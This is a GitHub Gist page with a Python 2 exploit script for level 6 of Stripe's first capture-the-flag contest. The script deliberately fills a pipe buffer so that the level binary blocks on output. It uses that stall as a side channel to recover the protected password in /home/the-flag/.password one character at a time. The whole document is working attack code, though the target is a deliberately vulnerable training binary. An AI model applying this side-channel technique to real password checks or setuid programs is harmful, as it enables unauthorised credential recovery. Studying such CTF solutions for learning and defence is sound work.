Last active
December 22, 2015 16:48
-
-
Save jsanders/6501376 to your computer and use it in GitHub Desktop.
Exploit in python for level 6 of Stripe's first CTF.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from os import pipe, write, close | |
| from subprocess import Popen, PIPE | |
| import select | |
| import string | |
| import sys | |
| PIPE_MAX = 1<<16 # 64k | |
| WELCOME_LEN = len("Welcome to the password checker!\n") | |
| def args(guess): | |
| return ['/levels/level06', '/home/the-flag/.password', guess] | |
| def correct(guess): | |
| buf = '?' * (PIPE_MAX - WELCOME_LEN - len(guess)) | |
| stdout_r, stdout_w = pipe() | |
| stderr_r, stderr_w = pipe() | |
| write(stderr_w, buf) | |
| process = Popen(args(guess + '?'), stdout = stdout_w, stderr = stderr_w) | |
| readable, _, _ = select.select([stdout_r], [], [], 0.01) | |
| correct = len(readable) == 0 | |
| [ close(fd) for fd in (stdout_r, stdout_w, stderr_r, stderr_w) ] | |
| process.terminate() | |
| return correct | |
| def finished(guess): | |
| return 'password was' in Popen(args(guess), stdout = PIPE, stderr = PIPE).stderr.read() | |
| characters = string.letters + string.digits + string.punctuation | |
| guess = '' | |
| while not finished(guess): | |
| for g in characters: | |
| new_guess = guess + g | |
| sys.stdout.write('Trying: %s\r' % new_guess); sys.stdout.flush() | |
| if correct(new_guess): | |
| guess = new_guess | |
| break | |
| print "\nPassword is: " + guess |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment